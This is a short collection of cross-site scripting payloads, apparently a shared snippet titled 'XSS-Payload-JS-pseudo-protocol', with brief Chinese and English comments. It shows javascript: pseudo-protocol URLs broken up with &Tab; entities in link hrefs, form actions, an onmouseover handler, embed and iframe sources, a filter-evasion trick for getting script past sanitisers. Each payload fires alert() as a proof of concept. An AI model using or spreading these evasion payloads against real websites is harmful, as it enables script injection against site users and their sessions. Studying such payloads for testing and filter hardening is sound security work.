XSS-Payload-JS-pseudo-protocol

by zicai

HTML

<!-- JavaScript 伪协议:在任意位置插入 &Tab; -->
<a href="javas&Tab;cript&Tab;:&Tab;&Tab;alert('a-href')">click me</a>

<form action="javas&Tab;cript&Tab;:&Tab;&Tab;alert('form-action')">
  <button>submit</button>
</form>

<span onmouseover="javascript&Tab;:&Tab;&Tab;alert('event handler')">hover me</span><!-- 只能在冒号前后插入 -->

<embed src="javas&Tab;cript&Tab;:&Tab;&Tab;alert('embed-src')" type=""><!-- only firefox -->

<iframe src="javas&Tab;cript&Tab;:&Tab;&Tab;alert('iframe-src')" frameborder="0"></iframe>